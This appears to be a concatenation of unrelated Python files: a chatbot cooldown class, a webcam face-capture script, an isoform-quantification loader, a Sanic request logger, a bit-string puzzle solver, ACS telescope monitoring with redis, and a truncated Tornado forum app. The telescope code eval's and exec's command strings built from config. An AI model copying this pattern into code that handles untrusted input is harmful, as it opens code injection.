                 user,
                 user_name,
                 ):
        self.parent = parent
        self.script_name = script_name
        self.command_key = command_key
        self.permission = permission
        self.permission_specific = permission_specific
        self.global_cooldown = global_cooldown
        self.user = user
        self.user_name = user_name
        self.user_cooldown = user_cooldown

    def user_has_permission(self):
        """True if `user` holds the configured permission."""
        return self.parent.HasPermission(self.user, self.permission, self.permission_specific)

    def is_on_cooldown(self):
        """True if either the global or the per-user cooldown is active."""
        return self.is_on_global_cooldown() or self.is_on_user_cooldown()

    def is_on_user_cooldown(self):
        return self.parent.IsOnUserCooldown(self.script_name, self.command_key, self.user)

    def is_on_global_cooldown(self):
        return self.parent.IsOnCooldown(self.script_name, self.command_key)

    def get_cooldown_duration(self):
        """Remaining cooldown: the larger of the global and user durations."""
        global_cooldown = self.get_global_cooldown()
        user_cooldown = self.get_user_cooldown()
        return global_cooldown if global_cooldown > user_cooldown else user_cooldown

    def get_global_cooldown(self):
        return self.parent.GetCooldownDuration(self.script_name, self.command_key)

    def get_user_cooldown(self):
        return self.parent.GetUserCooldownDuration(self.script_name, self.command_key, self.user)

    def set_cooldown(self):
        """Arm both the global and the per-user cooldown."""
        self.set_global_cooldown()
        self.set_user_cooldown()

    def set_global_cooldown(self):
        self.parent.AddCooldown(self.script_name, self.command_key, int(self.global_cooldown))

    def set_user_cooldown(self):
        self.parent.AddUserCooldown(self.script_name, self.command_key, self.user, int(self.user_cooldown))

    def execute(self, fn, arguments):
        """Run `fn(parent, arguments)` after permission and cooldown checks.

        Raises:
            PermissionError: user lacks the required permission.
            CooldownError: the command is still cooling down.
            ExecutionError: `fn` itself raised.
        """
        if not self.user_has_permission():
            raise PermissionError()
        if self.is_on_cooldown():
            raise CooldownError()
        try:
            return fn(self.parent, arguments)
        except Exception:
            # Bug fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; only real errors are wrapped now.
            raise ExecutionError()
|
import cv2
import numpy as np
import os

# Register a new person in the face database: capture up to 100 face crops
# from the default webcam and store them as grayscale JPEGs under
# Database/<name>/.  Press 'e' in the preview window to stop early.
nomb = input("Introduzca su nombre: ")
DirectoryPath = 'Database/' + str(nomb)
os.mkdir(DirectoryPath)
input("Presione enter para generar su carpeta de datos")

cam = cv2.VideoCapture(0)
cascPath = "Cascades/haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cascPath)

contador = 0
while True:
    _, imagen_marco = cam.read()
    grises = cv2.cvtColor(imagen_marco, cv2.COLOR_BGR2GRAY)
    # one crop saved per detected face, counter drives the file names
    for (x, y, w, h) in faceCascade.detectMultiScale(grises, 1.5, 5):
        cv2.rectangle(imagen_marco, (x, y), (x + w, y + h), (255, 0, 0), 4)
        contador += 1
        cv2.imwrite("Database/" + nomb + "/" + nomb + "_" + str(contador) + ".jpg",
                    grises[y:y + h, x:x + w])
    cv2.imshow("Registrando tu perfil en la base de datos ...", imagen_marco)
    if cv2.waitKey(1) & 0xFF == ord('e'):
        break
    elif contador >= 100:
        break
cam.release()
cv2.destroyAllWindows()
|
# Module-level dict; empty here — presumably populated by callers elsewhere.
# TODO(review): confirm intended use, or remove if dead.
idc = {}
|
# This file contains some random but maybe useful stuff
import numpy as np
from .out_utils import id_mapping
def get_fraction(gene_ids, FPKM, ignoreNan=False):
    """Convert per-transcript FPKM values into within-gene fractions.

    Transcripts belonging to the same gene are assumed to occupy a
    contiguous run in *gene_ids*.  For a gene whose FPKM sum is zero the
    fraction is NaN when *ignoreNan* is set, otherwise split uniformly
    across the gene's transcripts.
    """
    frac = np.zeros(len(FPKM))
    group_start = 0
    for pos in range(len(FPKM) + 1):
        # a group ends at the array end or where the gene id changes
        if pos < len(FPKM) and gene_ids[group_start] == gene_ids[pos]:
            continue
        total = float(np.sum(FPKM[group_start:pos]))
        if total == 0:
            if ignoreNan:
                frac[group_start:pos] = np.nan
            else:
                frac[group_start:pos] = 1.0 / (pos - group_start)
        else:
            frac[group_start:pos] = FPKM[group_start:pos] / total
        group_start = pos
    return frac
def loadresult(file_name, tran_ids, gene_ids=None, method="dice",
               ignoreNan=False):
    """
    Load results for isoforms from different methods.
    ------------------------------------------------
    Methods supported: DICEseq, BRIE, MISO, Cufflinks, Kallisto, flux, spanki

    Parameters
    ----------
    file_name : str
        Path of the result file produced by *method*.
    tran_ids : array-like of str
        Transcript ids, in the order the outputs should be returned.
    gene_ids : array-like of str, optional
        Gene ids matching *tran_ids*; required by methods whose fractions
        are derived via get_fraction().
    method : str
        One of "dice", "brie", "miso", "kallisto", "rsem", "cufflinks",
        "flux", "spanki" (case sensitive).
    ignoreNan : bool
        Passed through to get_fraction() for zero-expression genes.

    Returns
    -------
    (frac, FPKM) : two numpy arrays aligned with *tran_ids*; both are NaN
    when the method is unsupported.
    """
    frac = np.zeros(len(tran_ids))
    FPKM = np.zeros(len(tran_ids))
    CI95 = np.zeros(len(tran_ids)) + 1.0
    if ["dice", "brie"].count(method) == 1:
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        idxT = id_mapping(tran_ids, data[:,0])
        frac = data[idxT, 5].astype(float)
        FPKM = data[idxT, 4].astype(float)
    elif method == "miso":
        tran_miso = []
        frac_miso = np.array([])
        CI95_miso = np.array([])
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        for gn in range(data.shape[0]):
            _tran_ids = data[gn,4].split(",")
            for tr in range(len(_tran_ids)):
                #_tran_ids[tr] = ".".join(_tran_ids[tr].split(".")[:2])[1:]
                _tran_ids[tr] = _tran_ids[tr].split("_")[0][1:-2]
            _frac = np.array(data[gn,1].split(","),"float")
            _CI95 = np.array(data[gn,3].split(","),"float")
            _CI95 = _CI95 - np.array(data[gn,2].split(","),"float")
            # two-isoform events only report one fraction; derive the other
            if len(_tran_ids) == 2:
                _frac = np.append(_frac, 1-_frac[-1])
                _CI95 = np.append(_CI95, _CI95[-1])
            tran_miso += _tran_ids
            frac_miso = np.append(frac_miso, _frac)
            CI95_miso = np.append(CI95_miso, _CI95)
            # FPKM_miso = [float(x.split(":")[1]) for x in data[gn, 6].split(",")]
        tran_miso = np.array(tran_miso, dtype="str")
        idxT = id_mapping(tran_ids, tran_miso)
        for j in range(len(FPKM)):
            if idxT[j] >= 0:
                FPKM[j] = frac_miso[idxT[j]]
                CI95[j] = CI95_miso[idxT[j]]
            else:
                FPKM[j] = 0.0
                CI95[j] = 1.0
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    elif method == "kallisto":
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        idxT = id_mapping(tran_ids, [x.split("|")[1] for x in data[:,0]])
        FPKM = data[idxT, 4].astype(float)
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    elif method == "rsem":
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        idxT = id_mapping(tran_ids, [x.split("|")[1] for x in data[:,0]])
        FPKM = data[idxT, 6].astype(float)
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    elif method == "cufflinks":
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        idxT = id_mapping(tran_ids, data[:,0])
        for j in range(len(FPKM)):
            if idxT[j] >= 0:
                FPKM[j] = data[idxT[j], 9].astype(float)
            else:
                if ignoreNan == False:
                    FPKM[j] = 0.0
                else:
                    FPKM[j] = None
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    elif method == "flux":
        data = np.genfromtxt(file_name, skip_header=0, dtype="str")
        idxT = id_mapping(tran_ids, data[:,1])
        FPKM = data[idxT, 5].astype(float)
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    elif method == "spanki":
        data = np.genfromtxt(file_name, skip_header=1, dtype="str")
        idxT = id_mapping(tran_ids, data[:,1])
        FPKM = data[idxT, 3].astype(float)
        frac = get_fraction(gene_ids, FPKM, ignoreNan)
    else:
        # BUG FIX: the original format string was incomplete ("%"), so the
        # offending method name was never printed.
        print("Unsupported method: %s" % method)
        frac[:], FPKM[:] = None, None
    return frac, FPKM
|
import unittest
from tests.login_test import LoginTestCase

# Assemble the sanity suite from the login tests and run it verbosely.
loader = unittest.TestLoader()
sanityTestSuite = unittest.TestSuite([loader.loadTestsFromTestCase(LoginTestCase)])
unittest.TextTestRunner(verbosity=2).run(sanityTestSuite)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
from functools import wraps
from sanic.request import Request
from web_backend.nvlserver.module.request_logger.service import create_request_log_element
def request_logger(func):
    """Decorator that persists every API request/response pair to the database.

    Wraps an async Sanic view; after the view runs, the request and response
    bodies are decoded (when raw bytes) and handed to
    create_request_log_element together with the request URL.

    :param func: async view whose first positional argument is the Request
    :return: wrapped view returning the original response unchanged
    """
    @wraps(func)
    async def decorated_view(*args, **kwargs):
        resp = await func(*args, **kwargs)
        # LOG API ACCESS TO DATABASE
        if isinstance(args[0], Request):
            if isinstance(args[0].body, bytes):
                rdata = args[0].body.decode('utf-8')
            else:
                rdata = args[0].body
            # BUG FIX: the original tested args[0].body (the request) here
            # but decoded resp.body (the response) — test the response body.
            if isinstance(resp.body, bytes):
                resp_data = resp.body.decode('utf-8')
            else:
                resp_data = resp.body
            await create_request_log_element(args[0], args[0].url, rdata, resp_data)
        return resp
    return decorated_view
|
def inint():
    # Read a single integer from one line of stdin.
    return int(input())
def inlist():
    # Read one line of whitespace-separated integers from stdin.
    return list(map(int,input().split()))
# Shared mutable state used by work(): solution counter, target popcounts
# (a1, b1), reversed binary string of the sum (c), and its MSB index (num).
count=0
a1=0;b1=0;c=str();num=0
def work(i,m1,n1,carry=0,m='',n=''):
    """Recursively build two bit strings (LSB first) whose sum matches ``c``.

    i      -- current bit index into the reversed binary string ``c``
    m1/n1  -- popcounts accumulated so far for strings m and n
    carry  -- carry bit propagated into position i
    m/n    -- the candidate bit strings built so far (LSB first)

    Counts a solution into the module globals ``count``/``sola``/``solb``
    when the final popcounts match (a1, b1) in either order.
    """
    global count,a1,b1,num,c
    #print('index-',i,';c-',c,carry,n,'m1-',m1,'n1-',n1)
    if i == num+1 :
        if m1==a1 and n1==b1:
            if m not in sola or n not in solb:count+=1;sola.add(m);solb.add(n);print(m,n)
        elif m1==b1 and n1==a1:
            if n not in sola or m not in solb:count+=1;sola.add(n);solb.add(m);print(n,m)
        #print('sol',m,n,count)
        return
    # prune: neither required popcount can still be reached
    if (m1>a1 and m1>b1) or (n1>a1 and n1>b1):return
    #print(i,c,c[i],m1,n1)
    if carry==1:
        if c[i]=='1':
            #print(1,0,0);
            work(i+1,m1,n1,0,m+'0',n+'0')
            #print(1,1,1);
            work(i+1,m1+1,n1+1,1,m+'1',n+'1')
        else:
            #print(1,0,1);
            work(i+1,m1,n1+1,0,m+'0',n+'1')
            #print(1,1,0);
            work(i+1,m1+1,n1,0,m+'1',n+'0')
    else:
        if c[i]=='1':
            #print(0,1,0);
            work(i+1,m1+1,n1,0,m+'1',n+'0')
            #print(0,0,1);
            work(i+1,m1,n1+1,0,m+'0',n+'1')
        else:
            #print(0,0,0);
            # NOTE(review): the counts are passed as (n1, m1) here — swapped
            # relative to every other branch. Both digits are '0' so the
            # values are unchanged, but the swap mixes which counter tracks
            # which string on later additions — confirm this is intentional.
            work(i+1,n1,m1,0,m+'0',n+'0')
            #print(0,1,1);
            # NOTE(review): same (n1, m1) swap as above, with both +1.
            work(i+1,n1+1,m1+1,1,m+'1',n+'1')
# One test case per input line: a, b, cc. Find pairs of bit strings that sum
# to cc with popcounts matching those of a and b; work() accumulates the
# distinct-solution count into the module globals reset below.
for i in range(inint()):
    count = 0
    sola = set()
    solb = set()
    a, b, cc = inlist()
    c = bin(cc)[::-1]          # reversed binary digits of the target sum
    a1 = bin(a).count('1')     # required popcounts
    b1 = bin(b).count('1')
    # BUG FIX: int(log(cc, 2)) is computed in floating point and can round
    # down for exact powers of two; bit_length() gives the MSB index exactly
    # (this also removes the import that ran on every loop iteration).
    num = cc.bit_length() - 1
    work(0, 0, 0)
    print(count)
|
# ------------------------------------------------------------------
# imports
# ------------------------------------------------------------------
from shared.utils import HMILog
from shared.utils import tel_ids, redis_port
import threading
import time
from collections import Counter
import redis
import json
import jsonAcs
# Import ACS
import ACS__POA
from ACS import CBDescIn
from Acspy.Clients.SimpleClient import PySimpleClient
from Acspy.Common.Callbacks import CBvoid
# from Acspy.Common.Callbacks import CBdouble
from TelescopeStruct import props, GLOBAL_FREQ, QUEUE_FREQ
# Shared callback descriptor passed to ACS monitor creation; see the CBDescIn
# IDL for field semantics (values here are Python 2 long literals).
desc = CBDescIn(5L, 0L, 0L)
# ------------------------------------------------------------------
# Threading and Callback classes
# ------------------------------------------------------------------
class PollingThread(threading.Thread):
    """A ``threading.Thread`` carrying a cancellation event.

    ``stop()`` only raises the flag; the target callable is responsible for
    observing it (or for terminating on its own, as sub_polling does via the
    subscriber counter).
    """

    def __init__(self, *args, **kwargs):
        super(PollingThread, self).__init__(*args, **kwargs)
        # NOTE(review): in Python 3 Thread defines an internal _stop()
        # method that this attribute shadows — verify before upgrading
        # the interpreter.
        self._stop = threading.Event()

    def stop(self):
        """Raise the cancellation flag for this poller."""
        self._stop.set()
class MonitorCB(ACS__POA.CBdouble):
    """
    class that defines the callback for the acs components

    Each sample delivered by the ACS monitor is mirrored into redis under
    ``self.key`` with a 10-second TTL so stale values expire on their own.
    """
    def __init__(self, key):
        self.log = HMILog(title=__name__)
        # redis key under which samples for this property are published
        self.key = key
        # NOTE(review): connection is hard-coded to localhost:6379/db0 while
        # the PropertyMonitor* classes use redis_port[site_type] — confirm
        # this divergence is intentional.
        self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
    def done(self, completion, desc, a):
        """
        this method is called when monitoring ends and it writes to redis
        """
        # store the final sample under self.key with a 10 s TTL
        self.r.setex(self.key, 10, json.dumps({'status': 'done', 'value': completion}))
        self.log.info([['g', (" - PropertyMonitorLocal.done.%s - ") % (self.key)],
                       ['p', completion]])
    def working(self, completion, desc, a):
        """
        this method is called when monitoring and it writes to redis
        """
        # same 10 s TTL as done(), but flagged as an in-progress sample
        self.r.setex(self.key, 10, json.dumps({'status': 'working', 'value': completion}))
        self.log.info([['g', (" - PropertyMonitorLocal.working.%s - ") % (self.key)],
                       ['p', completion]])
# Prefix constants
# global monitoring component prefix
COMPONENT_PREFIX_GLOBAL = 'ACS:G'
# local monitoring component prefix
COMPONENT_PREFIX_LOCAL = 'ACS:L'
# name of the queue used for monitoring
QUEUE_NAME = 'ACS:MonitorQueue'
# name of the queue used for polling
POLLING_QUEUE = 'ACS:PollingQueue'
# name of the queue used for querying from db
MONGO_QUEUE = 'ACS:MongoQueue'
# prefix of the dicts used for comparing the values in the db
DICT_SET_NAME = 'ACS:DictSet'
# the monitoring dictionary that contains the references of all active monitors
MONITOR_DICT = 'ACS:Monitor:Dict'
# Create a client and the ArraySupervisor component
client = PySimpleClient()
supervisor = client.getComponent("ArraySupervisor")
# Local property monitor dict
# Counter mapping "<kind>:<property-key>" -> number of active subscribers;
# shared mutable state between the queue parser and the monitor classes.
local_queue = Counter()
# dict used for storing active polling threads
polling_threads = dict()
# dict for storing references to the components
dict_of_components = dict()
# get the components
TEST_JAVA_T1 = client.getComponent("TEST_JAVA_T1")
TEST_JAVA_T2 = client.getComponent("TEST_JAVA_T2")
# you can add more here
# add the components to the dict
dict_of_components[TEST_JAVA_T1.name] = TEST_JAVA_T1
dict_of_components[TEST_JAVA_T2.name] = TEST_JAVA_T2
# ------------------------------------------------------------------
# PropertyMonitor classes
# ------------------------------------------------------------------
class PropertyMonitorQueue:
    """Drains the redis subscription queues into the shared ``local_queue``.

    Three redis lists (monitoring, polling, mongo) carry "SUB:<key>" /
    "UNSUB:<key>" messages; a daemon thread pops them periodically and
    maintains a per-property reference counter in the module-level
    ``local_queue`` Counter, which the monitor classes act on.
    """
    def __init__(self, site_type):
        self.log = HMILog(title=__name__)
        self.log.info([['y', " - PropertyMonitor Queue - "], ['g', site_type]])
        self.site_type = site_type
        self.tel_ids = tel_ids[site_type]
        self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
        # to be on a safe side, clean the counter
        self.r.delete(DICT_SET_NAME)
        t = threading.Thread(target=self.queue_parser_loop)
        # set the thread to daemon for quicker termination
        t.daemon = True
        t.start()
        return
    def queue_parser_loop(self):
        """
        this method calls the queue_parser method every second
        """
        # NOTE(review): the actual period is QUEUE_FREQ / 10000000 seconds,
        # so "every second" holds only for a specific QUEUE_FREQ — confirm.
        while True:
            self.queue_parser()
            time.sleep(QUEUE_FREQ / 10000000)
    def queue_parser(self):
        """
        This method gets the list from the monitoring queue in redis. The values
        # get parsed and put into a counter dict.
        :return: a counter dict of components subscriptions
        """
        #####
        # Monitoring queue
        #####
        # NOTE(review): lrange only sizes the loop; each iteration rpops one
        # element, so concurrent producers may leave items for the next tick.
        for _ in self.r.lrange(QUEUE_NAME, 0, 1000):
            # Pop the element from queue and parse it
            pop = self.r.rpop(QUEUE_NAME)
            # split the pop'ed string
            pop_command = pop.split(':', 1)[0]
            pop_tel = pop.split(':', 1)[1]
            pop_tel = "Monitor:" + pop_tel
            # Depending on the prefix increment or decrement the counter
            if pop_command == 'UNSUB':
                self.log.info([['g', " - PropertyMonitorQueue.queue_parser.UNSUB - "],
                               ['p', pop_tel]])
                # Check if key value is lower than 0
                if local_queue[pop_tel] <= 0:
                    local_queue.pop(pop_tel, None)
                else:
                    local_queue[pop_tel] -= 1
            else:
                self.log.info([['g', " - PropertyMonitorQueue.queue_parser.SUB - "],
                               ['p', pop_tel]])
                local_queue[pop_tel] += 1
            print local_queue
        #####
        # Polling queue
        #####
        for _ in self.r.lrange(POLLING_QUEUE, 0, 1000):
            # Pop the element from queue and parse it
            pop = self.r.rpop(POLLING_QUEUE)
            pop_command = pop.split(':', 1)[0]
            pop_tel = pop.split(':', 1)[1]
            pop_tel = "Polling:" + pop_tel
            # Depending on the prefix increment or decrement the counter
            if pop_command == 'UNSUB':
                # Check if key value is lower than 0
                if local_queue[pop_tel] <= 0:
                    local_queue.pop(pop_tel, None)
                else:
                    local_queue[pop_tel] -= 1
            else:
                local_queue[pop_tel] += 1
            print local_queue
        #####
        # Database queue
        #####
        for _ in self.r.lrange(MONGO_QUEUE, 0, 1000):
            # Pop the element from queue and parse it
            pop = self.r.rpop(MONGO_QUEUE)
            pop_command = pop.split(':', 1)[0]
            pop_tel = pop.split(':', 1)[1]
            pop_tel = "Mongo:" + pop_tel
            # Depending on the prefix increment or decrement the counter
            if pop_command == 'UNSUB':
                # Check if key value is lower than 0
                if local_queue[pop_tel] <= 0:
                    local_queue.pop(pop_tel, None)
                else:
                    local_queue[pop_tel] -= 1
            else:
                local_queue[pop_tel] += 1
            print local_queue
class PropertyMonitorGlobal:
    """Periodically samples every registered component's global properties.

    Each tick evaluates the configured property-access expressions for all
    components in ``dict_of_components`` and writes the resulting dict to
    redis under 'ACS:G:<component>'.
    """
    def __init__(self, site_type):
        self.log = HMILog(title=__name__)
        self.log.info([['y', " - PropertyMonitor Global - "], ['g', site_type]])
        self.site_type = site_type
        self.tel_ids = tel_ids[site_type]
        self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
        t = threading.Thread(target=self.tel_global_loop)
        # set the thread to daemon for quicker termination
        t.daemon = True
        t.start()
        return
    def tel_global_loop(self):
        """
        this method calls monitor_component_status every second
        """
        # NOTE(review): the real period is GLOBAL_FREQ / 10000000 seconds.
        while True:
            self.monitor_component_status()
            time.sleep(GLOBAL_FREQ / 10000000)
    def monitor_component_status(self):
        """
        This method monitors the global properties of the components and
        # writes the values into redis.
        :return:
        """
        # for each component in the dict
        for x in dict_of_components.keys():
            # Build the component property dict
            comp_prop_dict = dict()
            # get the config for the global component
            glob = props.get(x)
            # for each property in the global component
            for xy in glob["props"]:
                # eval the pollin command and save to dict
                # HACK: the accessor is assembled from config strings and
                # eval'd (twice — once more for the log below); safe only
                # while `props` comes from trusted configuration.
                comp_prop_dict[xy[0]] = eval(glob["component_name"] + [xy[1]][0])
                self.log.info([[
                    'g', (" - PropertyMonitorGlobal.monitor_component_status.%s.%s - ") %
                    (glob["component_name"], xy[0])
                ], ['p', eval(glob["component_name"] + [xy[1]][0])]])
            # Create key for the component
            rkey = COMPONENT_PREFIX_GLOBAL + ':%s' % x
            # Save the dict into redis
            self.r.set(rkey, json.dumps(comp_prop_dict))
        # NOTE(review): this stores the Python repr of the live component
        # objects (not JSON) under the bare prefix — confirm consumers
        # expect that.
        self.r.set(COMPONENT_PREFIX_GLOBAL, dict_of_components)
class PropertyMonitorLocal:
    """Serves per-property local monitoring driven by ``local_queue``.

    A daemon thread re-evaluates the subscription counters once per second
    and, per property, starts/stops either a BACI monitor ("Monitor:" keys),
    a polling thread ("Polling:" keys) or — not yet implemented — a MongoDB
    history query ("Mongo:" keys). Sampled values are published into redis
    with a 10-second TTL.
    """
    def __init__(self, site_type):
        self.log = HMILog(title=__name__)
        self.log.info([['y', " - PropertyMonitor Local - "], ['g', site_type]])
        self.site_type = site_type
        self.tel_ids = tel_ids[site_type]
        self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
        t = threading.Thread(target=self.tel_local_loop)
        # set the thread to daemon for quicker termination
        t.daemon = True
        t.start()
        return
    def get_redis(self):
        """
        :return: the instance of the redis client
        """
        return self.r
    def tel_local_loop(self):
        """
        this method calls monitor_component_properties every second
        """
        while True:
            self.monitor_component_properties()
            time.sleep(1)
    # Polling generator
    def sub_polling(self, component, params, key, command):
        """
        this method returns the code for getting the value of a specific prop in polling mode
        :param component: the component that has the prop
        :param params: dict of additional parameters
        :param key: the key used to build the redis key
        :param command: command used for polling
        :return: code for getting a prop value in polling mode
        """
        # create the string containing the code
        command_str = "%s%s" % (component, command)
        print "started polling " + key + " with frequency:" + \
            str(params["polling_interval"])
        # save the return value
        # NOTE(review): the loop terminates via the subscriber counter only;
        # the PollingThread.stop() event is never consulted here.
        while local_queue.get("Polling:" + key) > 0:
            # eval the string and save the value
            # HACK: command_str is assembled from config and eval'd — safe
            # only while the props config is trusted.
            value = eval(command_str)
            print key + ": " + str(value)
            # save the value into redis
            # Build local component key
            rkey_local = COMPONENT_PREFIX_LOCAL + ':Polling:%s' % key
            set_name = DICT_SET_NAME + ':%s' % key
            # check if the value in redis different
            # sadd returns 1 only for a value not already in the set, i.e.
            # redis is updated only when the sampled value changed
            if self.r.sadd(set_name, value):
                # recreate the set
                self.r.delete(set_name)
                self.r.sadd(set_name, value)
                # Push to local component key; TTL 10sec
                self.r.setex(rkey_local, 10, value)
            else:
                continue
            # sleep for x seconds where x is specified in the config
            # NOTE(review): because of the `continue` above, this sleep is
            # skipped when the value was unchanged — the poller then spins
            # at full speed. Confirm whether that is intended.
            time.sleep(int(params["polling_interval"] / 10000000))
    # Monitor generator
    def sub_monitoring(self, component, params, command):
        """
        this method creates a string that contains monitor creation code
        :param component: the name of the component we are monitoring on
        :param params: dict of params (default monitoring rate etc.
        :param command: the command to create the monitor
        :return: monitor creation string
        """
        # creates monitor for the specified component and prop
        mon_create = "mon=%s%s.create_monitor(client.activateOffShoot(cb), desc)" % (
            component, command
        )
        # set the monitoring interval
        mon_timer_trigger = "mon.set_timer_trigger(%d)" % int(
            params["timer_trigger_interval"]
        )
        # create the final string that will be exec'ed
        mon_setup = mon_create + "\n" + mon_timer_trigger + "\n" + \
            "mon.set_value_trigger(%i, %s)" % (
                params["value_trigger_delta"], params["is_monitor_value"])
        return mon_setup
    def create_monitor(self, rkey_local, key):
        """
        spawn a new monitor in a greenlet
        :param rkey_local: the key used for redis
        :param key: component name to get the properties from the config
        """
        cb = MonitorCB(rkey_local)
        # creates the monitor from the generated string
        # HACK: exec of config-derived code; binds the local name `mon`
        exec(
            self.sub_monitoring(
                props[key]['component_name'],
                props[key]["Monitor"]["additional_parameters"],
                props[key]["Monitor"]["monitoring_command"]
            )
        )
        # adds the reference to the newly created monitor to monitors dict
        encoded_mon = jsonAcs.encode(mon)
        # add the newly created monitor reference to the hset in redis
        self.r.hset(MONITOR_DICT, key, encoded_mon)
    def monitor_component_properties(self):
        """
        This method monitors the local properties of a component.
        # Monitoring occurs only for the components that has subs
        listening. Monitoring can be done on three different ways
        # (BACI, Polling or get history from MongoDB)
        """
        for key in local_queue.keys():
            # parse to get the property name without the prefix
            monitor_key = key.split(':', 1)[1]
            # teardown: no subscribers left for a polled property
            if local_queue[key] == 0 and monitor_key in polling_threads.keys():
                # get the thread of the property
                t = polling_threads.pop(monitor_key, None)
                # stop the thread
                t.stop()
                print key + " thread removed."
            # check if the property has a monitor when the counter reaches 0
            if local_queue[key] == 0 and self.r.hexists(MONITOR_DICT, monitor_key):
                # get the monitor from redis hset
                redis_monitor = self.r.hget(MONITOR_DICT, monitor_key)
                m = jsonAcs.decode(redis_monitor)
                # destroy the monitor
                m.destroy()
                print key + " monitor removed."
                # remove the monitor key from the hset in redis
                self.r.hdel(MONITOR_DICT, monitor_key)
            if local_queue[key] > 0:
                # split the key to check what kind of monitoring is needed
                key_prefix = key.split(':', 1)[0]
                key = key.split(':', 1)[1]
                # dict used for saving data to redis
                tel_prop_dict = dict()
                # when there are 0 subscribers to a key check if monitor exists
                if key_prefix == "Monitor":
                    tel_prop_dict[key] = ""
                    # Build local component key
                    rkey_local = COMPONENT_PREFIX_LOCAL + ':Monitor:%s' % key
                    set_name = DICT_SET_NAME + ':%s' % key
                    # check the redis hset if the monitor exists
                    if not self.r.hexists(MONITOR_DICT, monitor_key):
                        self.create_monitor(rkey_local, key)
                        print "Added monitor for property " + key + "."
                    # check if the value in redis different
                    if self.r.sadd(set_name, json.dumps(tel_prop_dict)):
                        # recreate the set
                        self.r.delete(set_name)
                        self.r.sadd(set_name, json.dumps(tel_prop_dict))
                        # Push to local component key; TTL 10sec
                        self.r.setex(rkey_local, 10, json.dumps(tel_prop_dict))
                    else:
                        continue
                elif key_prefix == "Polling":
                    # if a thread for the current property doesn't exist, create it
                    if key not in polling_threads.keys():
                        # create a polling thread
                        t = PollingThread(
                            target=self.sub_polling,
                            args=(
                                props[key]["component_name"],
                                props[key]["Polling"]["additional_parameters"], key,
                                props[key]["Polling"]["polling_command"]
                            )
                        )
                        polling_threads[key] = t
                        t.start()
                # todo: not implemented yet
                elif key_prefix == "Mongo":
                    print "DB not supported yet"
                else:
                    print "unsupported monitoring"
|
# coding: utf-8
import os
import base64
import uuid
import json
import tornado.auth
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
from tornado.web import url
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
import models
# Command-line options (tornado.options): --port, --debug and --db_path.
define("port", default=8888, help="run on the given port", type=int)
define("debug", default=True, type=bool)
define("db_path", default='sqlite:///test.db', type=str)
class Application(tornado.web.Application):
    """Tornado application: URL routes, settings, and the SQLAlchemy session.

    Exposes ``self.db``, a scoped session bound to the engine built from the
    --db_path option; handlers reach it through BaseHandler.db.
    """
    def __init__(self):
        handlers = [
            url(r'/', IndexHandler, name='index'),
            url(r'/thread/(\d+)', ThreadHandler, name='thread'),
        ]
        settings = dict(
            debug=options.debug,
            static_path=os.path.join(os.path.dirname(__file__), 'static'),
            template_path=os.path.join(os.path.dirname(__file__), 'templates'),
            xsrf_cookies=True,
            # NOTE(review): the cookie secret is regenerated on every start,
            # which invalidates all previously signed cookies — confirm
            # that is acceptable for this app.
            cookie_secret=base64.b64encode(
                uuid.uuid4().bytes + uuid.uuid4().bytes),
        )
        tornado.web.Application.__init__(self, handlers, **settings)
        # NOTE(review): `convert_unicode` was removed in SQLAlchemy 1.4 —
        # verify the pinned SQLAlchemy version before upgrading.
        engine = create_engine(
            options.db_path, convert_unicode=True, echo=options.debug)
        models.init_db(engine)
        self.db = scoped_session(sessionmaker(bind=engine))
class BaseHandler(tornado.web.RequestHandler):
    """Common base handler exposing the application-wide DB session."""
    @property
    def db(self):
        # scoped SQLAlchemy session created by Application.__init__
        return self.application.db
# Write your handlers here
class IndexHandler(BaseHandler):
    """Thread list: JSON for XHR clients, the HTML page otherwise;
    POST creates a new thread from form arguments."""

    def get(self):
        # BUG FIX: requests without an X-Requested-With header previously
        # fell through both branches and received an empty response; treat
        # anything that is not an XHR as a page request.
        if self.request.headers.get("X-Requested-With") == "XMLHttpRequest":
            t = self.db.query(
                models.Thread.id,
                models.Thread.title,
                models.Thread.author).all()
            threads = [dict(zip(('id', 'title', 'author'), _)) for _ in t]
            self.write(json.dumps(threads))
        else:
            self.render('index.html')

    def post(self):
        """Create a thread; always answers 'ok' (best-effort, like the
        comment endpoint)."""
        try:
            author = self.get_argument('author', None)
            title = self.get_argument('title', None)
            body = self.get_argument('body', None)
            t = models.Thread(author=author, title=title, body=body)
            self.db.add(t)
            self.db.commit()
        except Exception as e:
            # log instead of swallowing silently (consistent with
            # ThreadHandler.post)
            print(e)
            self.db.rollback()
        finally:
            self.db.close()
        self.write('ok')
class ThreadHandler(BaseHandler):
    """Single thread: JSON (thread + comments) for XHR clients, the HTML
    page otherwise; POST attaches a comment to the thread."""

    def get(self, id):
        # BUG FIX: header-less (direct browser) requests previously got an
        # empty response; treat anything that is not an XHR as a page request.
        if self.request.headers.get("X-Requested-With") == "XMLHttpRequest":
            t = self.db.query(
                models.Thread.id,
                models.Thread.author,
                models.Thread.title,
                models.Thread.body,
            ).filter_by(id=id).first()
            c = self.db.query(
                models.Comment.author,
                models.Comment.comment).filter_by(thread_id=id).all()
            comments = [dict(zip(('author', 'comment'), _)) for _ in c]
            thread = dict(zip(('id', 'author', 'title', 'body'), t))
            thread.update({'comments': comments})
            self.write(json.dumps(thread))
        else:
            self.render('thread.html')

    def post(self, id):
        """Attach a comment to thread *id*; always answers 'ok'."""
        try:
            author = self.get_argument('author', None)
